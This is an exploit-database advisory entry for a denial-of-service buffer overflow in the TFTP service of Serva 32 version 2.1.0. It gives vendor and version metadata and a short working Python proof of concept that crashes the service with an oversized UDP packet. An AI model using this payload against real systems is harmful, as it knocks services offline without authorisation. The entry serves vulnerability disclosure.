Serva 32 TFTP Buffer overflow DoS

vendor:

Serva

by:

Sapling

N/A

CVSS

N/A

Buffer Overflow

119

CWE

Product Name: Serva

Affected Version From: 2.1.0

Affected Version To: 2.1.0

Patch Exists: NO

Related CWE: Unknown

CPE: a:vercot:serva:2.1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8, Windows 7, Windows XP SP1-3

2013

Serva 32 TFTP Buffer overflow DoS

This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this time the exploit is only a denial of service but evidence show it may be controllable. The difficulty with controlling it at this point was the failure to overwrite the SEH chains or bypass them. The crash occurs when sending a message longer than 509 bytes long

Mitigation:

No known mitigation at this time

Source

Exploit-DB raw data:

#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this
#time the exploit is only a denial of service but evidence show it may be controllable.
#The difficulty with controlling it at this point was the failure to overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than 509 bytes long

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file